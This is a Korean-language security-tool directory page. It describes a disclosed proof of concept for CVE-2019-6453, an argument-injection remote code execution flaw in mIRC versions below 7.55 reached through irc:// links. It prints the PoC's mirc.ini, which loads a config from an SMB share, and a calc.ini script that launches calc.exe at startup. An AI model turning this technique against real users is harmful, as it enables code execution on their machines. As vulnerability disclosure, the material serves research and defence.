Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2019-6453-poc — Proof of calc for CVE-2019-6453 | Kitploit
도구/GitHubGitHub/proofofcalc/cve-2019-6453-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubproofofcalc/cve-2019-6453-poc

cve-2019-6453-poc

Proof of calc for CVE-2019-6453

저장소 보기
48122년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2019-6453: 사용자 정의 URI 프로토콜 핸들러를 통한 인수 주입으로 mIRC <7.55에서의 RCE

mIRC에서 irc:// URI 프로토콜 핸들러를 통해 원격 코드 실행(Remote Code Execution) 취약점을 발견했습니다. mIRC는 인수 목록의 끝을 표시하기 위해 -- 같은 시길을 사용하지 않기 때문에, 공격자는 irc:// 링크를 통해 mIRC에 인수를 전달하고 공격자가 제어하는 Samba 파일 서버에서 사용자 정의 mirc.ini를 로드하여 임의 코드를 실행할 수 있습니다. **ircs://**도 동일하게 작동합니다.

PoC

증명에 필요한 파일은 mirc.ini, calc.ini, poc.html 세 가지입니다. 공격자 측에서 Samba 파일 서버가 실행 중이라고 가정합니다. 예제를 위해 다음 코드들은 호스트 127.0.0.1에서 실행 중임을 가정합니다 (즉, 아래 파일에서 127.0.0.1을 자신의 서버 주소로 바꾸어 시도해 보십시오).

mirc.ini

mirc.ini는 파일 서버의 C:\mirc-poc\mirc.ini에 위치해야 하는 사용자 정의 구성 파일입니다.

root@kitploit:~
[rfiles]
n2=\\127.0.0.1\C$\mirc-poc\calc.ini

calc.ini

calc.ini는 파일 서버의 C:\mirc-poc\calc.ini에 위치해야 하는 원격 스크립트 파일입니다.

root@kitploit:~
[script]
n0=on *:START: {
n1=  /run calc.exe
n2=}

poc.html

poc.html을 방문하기만 하면 mIRC가 irc:// URI 스킴의 기본 핸들러로 설정되어 있고 브라우저가 페이로드를 인코딩하지 않는 경우 작동합니다. 브라우저와 구성에 따라 프롬프트가 표시될 수도 있습니다 (Firefox의 경우는 아님).

root@kitploit:~

PoC gif

PoC gif

영향을 받는 버전

이 PoC는 mIRC <7.55에서 실행됩니다.

Edge 42.17134 (마지막 미리보기 버전) 및 Firefox 64.0.2 (마지막 릴리스)에서 PoC를 트리거할 수 있습니다. Chrome에서는 URI 프로토콜을 처리하는 방식 (URI가 애플리케이션에 전달되기 전에 인코딩됨) 때문에 작동하지 않습니다.

작성자

  • Baptiste Devigne (Geluchat) and Benjamin Chetioui (SIben)
도구 다운로드